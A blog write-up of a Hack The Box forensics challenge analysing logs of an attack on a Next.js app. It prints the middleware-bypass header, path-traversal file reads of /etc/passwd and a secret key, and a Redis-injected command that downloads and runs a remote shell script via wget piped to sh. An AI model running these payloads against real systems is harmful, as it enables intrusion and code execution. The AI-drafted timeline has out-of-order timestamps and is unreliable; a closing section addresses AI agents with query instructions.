# NeuroSync-D

**About the box**

* DFIR
* Easy
* Retired
* [link](https://app.hackthebox.com/sherlocks/NeuroSync-D?tab=play_sherlock)

***

## Background

> NeuroSync™ is a leading suite of products focusing on developing cutting edge medical BCI devices, designed by the Korosaki Coorporaton. Recently, an APT group targeted them and was able to infiltrate their infrastructure and is now moving laterally to compromise more systems. It appears that they have even managed to hijack a large number of online devices by exploiting an N-day vulnerability. Your task is to find out how they were able to compromise the infrastructure and understand how to secure it.

I downloaded the evidence file form HTB and this is what we got

<figure><img src="/files/UgKtGcFQOD12h9QXLzKI" alt=""><figcaption></figcaption></figure>

I went in with zero methodology and zero playbook. Because i never investigated a web related attacks

### 1. What version of Next.js is the application using?

Before that  I knew its something web related framework but not 100% sure what was Next.js used&#x20;

then googled it <mark style="background-color:$warning;">Next.js is a React-based framework by Vercel that handles routing, bundling, server-side rendering, all the boring stuff automatically</mark>&#x20;

Since it's a frontend framework, `interface.log` is the right place to look. The dev-server startup banner gives it away immediately

<figure><img src="/files/RgN6t3PHOVfCBYfNiquP" alt=""><figcaption></figcaption></figure>

Answer: `15.1.0`

***

### 2. What local port is the Next.js-based application running on?

we can see in the above screenshot

`http://localhost:3000`

Answer: `3000`

***

### 3. A critical Next.js vulnerability was released in March 2025, and this version appears to be affected. What is the CVE identifier for this vulnerability?

I searched "Next.js vulnerability March 2025" + the version and landed on this pretty fast.

<figure><img src="/files/QrGFsx0x1r3DKjLy2oM3" alt=""><figcaption></figcaption></figure>

**CVE-2025-29927** — a critical middleware authorization bypass (CVSS 9.1)

ok i didnt had any idea about this vulnerability or anything so watched some YT and Chatgpt

this is what i understood&#x20;

**middleware** in a Next.js app is code that runs before every request reaches the actual page or API route. Think of it like a bouncer: every request has to pass through it, and it decides whether to let you in, kick you out, or redirect you somewhere else.

**How the attack works:**

Say you're running `example.com` and you have an admin page at `example.com/admin`. The middleware's job is simple — if you have the right credentials, let you through; if not, block you. That's it.

The bug is that Next.js has a quirk: if a request carries a special internal header called `x-middleware-subrequest`, the middleware skips itself and lets the request pass through unchecked.

```
GET /admin
x-middleware-subrequest: middleware
```

That's it. Send that header and you're inside the admin page — no credentials, no checks, nothing.

more about the vulnerability this page \
<https://github.com/lirantal/vulnerable-nextjs-14-CVE-2025-29927>

Answer: `CVE-2025-29927`

***

### 4. The attacker tried to enumerate some static files that are typically available in the Next.js framework, most likely to retrieve its version. What is the first file he could get?

The attacker hit a bunch of `/_next/static/chunks/` paths trying to pull known Next.js files

Most returned 404, but in `access.log` the first one to come back with HTTP 200 was:

<figure><img src="/files/dBXGiXIG4QRVfUk0gChN" alt=""><figcaption></figcaption></figure>

Ansewer: `main-app.js`

***

### 5. Then the attacker appears to have found an endpoint that is potentially affected by the previously identified vulnerability. What is that endpoint?

in `access.log`  i saw that this route was hitting more with different status code started with `401` they got `200` <br>

i think its the protected endpoint the middelware is trying to stop accessing&#x20;

<figure><img src="/files/jez6sYgNtCOKDzmNqR7J" alt=""><figcaption></figcaption></figure>

Answer: `/api/bci/analytics` &#x20;

***

### 6.  How many requests to this endpoint have resulted in an "Unauthorized" response?

5 failed attempts

<figure><img src="/files/h19TcMMkC4nPzoFcXquc" alt=""><figcaption></figcaption></figure>

Answer: `5`

***

### 7. When is a successful response received from the vulnerable endpoint, meaning that the middleware has been bypassed?

with in couple of minutes they are in the analytics endpoint is now wide open

<figure><img src="/files/oLxonIn2JVdPv2nPfbuK" alt=""><figcaption></figcaption></figure>

Answer: `2025-04-01 11:38:05` &#x20;

***

### 8. Given the previous failed requests, what will most likely be the final value for the vulnerable header used to exploit the vulnerability and bypass the middleware?

\
I actually got confused here at first — I thought seeing `middleware:middleware:middleware:middleware` in the logs was the answer (4 segments). It wasn't.

<figure><img src="https://media3.giphy.com/media/v1.Y2lkPTZjMDliOTUybm5kNjVyMnE1NmY3YXBzYWd3dW5rdzVhZGJtdmkxcGswcjBraWl2dCZlcD12MV9naWZzX3NlYXJjaCZjdD1n/WRQBXSCnEFJIuxktnw/200.gif" alt=""><figcaption></figcaption></figure>

i really didnt get so i littrally copy pasted the `middleware:...` then gone though some blogs i got this&#x20;

<figure><img src="/files/eawVXvlMhMm93VrS4TA1" alt=""><figcaption></figcaption></figure>

[blog](https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware)

The framework counts segments split by `:`. Each segment matching the middleware name increments the depth counter. When `depth >= MAX_RECURSION_DEPTH` (which is 5), it skips. So you need exactly 5 segments:

```
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
```

we can see n `interface.log` the earlier attempts with 1, 2, 3, 4 segments all failed. The 5-segment version was the one that got the 200.

Answer: `middleware:middleware:middleware:middleware:middleware`

now they have bypassed auth on analytics endpoint

***

### 9. The attacker chained the vulnerability with an SSRF attack, which allowed them to perform an internal port scan and discover an internal API. On which port is the API accessible?

again "SSRF" search in the google and i saw some examples what is ssrf how its done in basic in simple words SSRF is\
when attacker tricks a server into making network requests to a different location

Since the question says API, `data-api.log` is the right place.

<figure><img src="/files/IiveYpSkjhVv4iRJIBRG" alt=""><figcaption></figcaption></figure>

Port 4000, internal, not exposed publicly. The attacker used SSRF through the analytics endpoint to scan internal ports and confirm this service exists. SSRF

Answer: `4000` &#x20;

***

### 10. After the port scan, the attacker starts a brute-force attack to find some vulnerable endpoints in the previously identified API. Which vulnerable endpoint was found?

The attacker brute-forced common REST endpoint names against `127.0.0.1:`  can see them cycling through `/users`, `/profile`, `/settings`, `/password-reset`, `/forgot-password`, `/posts`, `/comments`, `/products`, `/orders`, `/cart` and more in `data-api.log`

<figure><img src="/files/XAdl68ijnsR2mzN8fxn8" alt=""><figcaption></figcaption></figure>

then i thought its `/analytics` then we see the log i thinks this not vulnerable so they move forward

<figure><img src="/files/sQOvgyHqTPLP8EjnfMlt" alt=""><figcaption></figcaption></figure>

Most were dead ends. Then they hit `/logs`, and it responded and accepted a `logFile` parameter. That's a red flag&#x20;

<figure><img src="/files/2hDDfan3hpxkGbBCH2KV" alt=""><figcaption></figcaption></figure>

Answer:`/logs`&#x20;

***

### 11. When the vulnerable endpoint found was used maliciously for the first time?

<figure><img src="/files/DZbAUlr64U7MPpSKy80H" alt=""><figcaption></figcaption></figure>

Answer: `2025-04-01 11:39:01`

***

### 12. What is the attack name the endpoint is vulnerable to?

I actually asked ChatGPT on this one, not gonna pretend otherwise.

<figure><img src="/files/MdVc0rZAuzQaK988D8VT" alt=""><figcaption></figcaption></figure>

The `logFile` parameter takes user input and uses it directly to read a file, with no proper sanitization. The attacker used `../` sequences to climb out of the intended `/var/log/` directory and access arbitrary files anywhere on the system.

more simple words <mark style="background-color:$warning;">Local File Inclusion (LFI) is a web application vulnerability that allows an attacker to trick a server into executing or exposing unintended files</mark>

Answer: `Local File Inclusion`

***

### 13. What is the name of the file that was targeted the last time the vulnerable endpoint was exploited?

The final LFI request in `data-api.log`

<figure><img src="/files/bLTvtpLvf8rsgITYEbLM" alt=""><figcaption></figcaption></figure>

a file literally called `secret.key` sitting in `/tmp` probably some auth token or some signed key

Answer: `secret.key`

***

### 14. Finally, the attacker uses the sensitive information obtained earlier to create a special command that allows them to perform Redis injection and gain RCE on the system. What is the command string?

This one took a minute. BCI command? Google it. A BCI command is an action sent to a Brain-Computer Interface device — things like MOVE\_UP, MOVE\_DOWN etc. You can see legit ones being pushed to Redis throughout the logs.

In `redis.log` there's a suspicious `RPUSH` into `bci_commands` with a base64-encoded payload using the `OS_EXEC` prefix:

<figure><img src="/files/i49bYYACIkWsYKjlF1vQ" alt=""><figcaption></figcaption></figure>

Answer: `OS_EXEC|d2dldCBodHRwOi8vMTg1LjIwMi4yLjE0Ny9oNFBsbjQvcnVuLnNoIC1PLSB8IHNo|f1f0c1feadb5abc79e700cac7ac63cccf91e818ecf693ad7073e3a448fa13bbb`

***

### 15. Once decoded, what is the command?

Decode the base64 chunk and you get the command. Confirmed in `bci-device.log` where the device actually ran it:

<figure><img src="/files/VS82rTXGJl8zCMPkU192" alt=""><figcaption></figcaption></figure>

Answer: `wget http://185.202.2.147/h4Pln4/run.sh -O- | sh`

***

### Time Line&#x20;

`I used claude to write this`&#x20;

```
2025-04-01 11:37:17  [RECON]          GET / → HTTP 200, confirms live target
2025-04-01 11:37:35  [RECON]          GET /_next/static/chunks/framework.js → 404
2025-04-01 11:37:38  [RECON]          GET /_next/static/chunks/main.js → 404
2025-04-01 11:37:40  [RECON]          GET /_next/static/chunks/commons.js → 404
2025-04-01 11:37:44  [FINGERPRINT]    GET /_next/static/chunks/main-app.js → 200 ✓ version confirmed
2025-04-01 11:37:47  [RECON]          GET /_next/static/chunks/app/page.js → 200
2025-04-01 11:37:58  [PROBE]          GET /api/bci/analytics → 401 Unauthorized (attempt 1)
2025-04-01 11:37:59  [PROBE]          GET /api/bci/analytics → 401 Unauthorized (attempt 2)
2025-04-01 11:38:01  [PROBE]          GET /api/bci/analytics → 401 Unauthorized (attempt 3)
2025-04-01 11:38:02  [PROBE]          GET /api/bci/analytics → 401 Unauthorized (attempt 4)
2025-04-01 11:38:04  [PROBE]          GET /api/bci/analytics → 401 Unauthorized (attempt 5)
2025-04-01 11:38:05  [CVE-2025-29927] GET /api/bci/analytics + x-middleware-subrequest → 200 ✓ bypass success
2025-04-01 11:35:09  [SSRF]           Internal port scan → port 4000 discovered (data-api service)
2025-04-01 11:38:37  [BRUTE]          GET /users, /profile, /settings, /password-reset ... → all dead ends
2025-04-01 11:38:52  [BRUTE]          GET /logs → responds + accepts logFile param ✓
2025-04-01 11:38:52  [LFI]            GET /logs?logFile=/var/log/logfile.txt → baseline test
2025-04-01 11:39:01  [LFI]            GET /logs?logFile=../../../../etc/passwd → 20 lines read ✓
2025-04-01 11:39:03  [LFI]            GET /logs?logFile=../../../../proc/self/environ → 1 line read ✓
2025-04-01 11:39:05  [LFI]            GET /logs?logFile=../../../../var/log/app.log → read ✓
2025-04-01 11:39:07  [LFI]            GET /logs?logFile=../../../../app/data-api/index.js → read ✓
2025-04-01 11:39:24  [LFI]            GET /logs?logFile=../../../../tmp/secret.key → read ✓ key obtained
2025-04-01 11:39:39  [REDIS INJECT]   RPUSH bci_commands OS_EXEC|base64(wget ...run.sh -O- | sh)|secret.key
2025-04-01 11:39:26  [RCE]            BCI Device executes: wget http://185.202.2.147/h4Pln4/run.sh -O- | sh
```

***

I wanted to search more what happened next but the logs was ended there&#x20;

<figure><img src="/files/RAp2WnYSIWNpDmx4baF1" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://chandan.gitbook.io/blogs/sherlocks/neurosync-d.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.